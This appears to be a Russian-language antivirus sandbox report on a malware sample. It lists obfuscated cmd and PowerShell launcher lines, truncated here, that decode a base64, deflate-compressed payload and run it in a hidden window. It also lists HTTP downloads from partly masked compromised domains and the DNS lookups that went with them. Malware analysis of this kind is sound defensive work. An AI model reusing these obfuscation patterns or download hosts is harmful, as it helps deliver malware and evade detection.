Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\cmd /C "SeT LdEbZ=^& ( $sheLLId[1]+$shelliD[13]+'X') (NEw-oBJEct IO.COmpREsSIoN.deFLaTeSTrEAM([io.MemorYsTrEaM] [CoNVerT]::fROMBASE64STRiNG( 'TZBNa8JAEIb/Sg6BVaybi7bUEEhbK3iwpZZ...
Сетевая активность
Подключается к
- 'fi####ellamusica.it':80
- 'az####x.meetme.pro':443
- 'ef###xmedia.com':80
- 'ef###xmedia.com':443
- 'br######rinhabeauty.com.br':80
- 'br######rinhabeauty.com.br':443
- 'ad#####tsecurity.com':80
- 'se##.com':443
TCP
Запросы HTTP GET
- http://www.fi####ellamusica.it/4V
- http://ef###xmedia.com/sc
- http://br######rinhabeauty.com.br/QRu4EMAe
- http://www.br######rinhabeauty.com.br/QRu4EMAe
- http://www.ad#####tsecurity.com/RDFiiXyc
Другие
- 'az####x.meetme.pro':443
- 'ef###xmedia.com':443
- 'br######rinhabeauty.com.br':443
- 'se##.com':443
UDP
- DNS ASK fi####ellamusica.it
- DNS ASK az####x.meetme.pro
- DNS ASK ef###xmedia.com
- DNS ASK ma####icchureps.com
- DNS ASK br######rinhabeauty.com.br
- DNS ASK ad#####tsecurity.com
- DNS ASK se##.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\cmd /C "SeT LdEbZ=^& ( $sheLLId[1]+$shelliD[13]+'X') (NEw-oBJEct IO.COmpREsSIoN.deFLaTeSTrEAM([io.MemorYsTrEaM] [CoNVerT]::fROMBASE64STRiNG( 'TZBNa8JAEIb/Sg6BVaybi7bUEEhbK3iwpZZ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( &( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"...
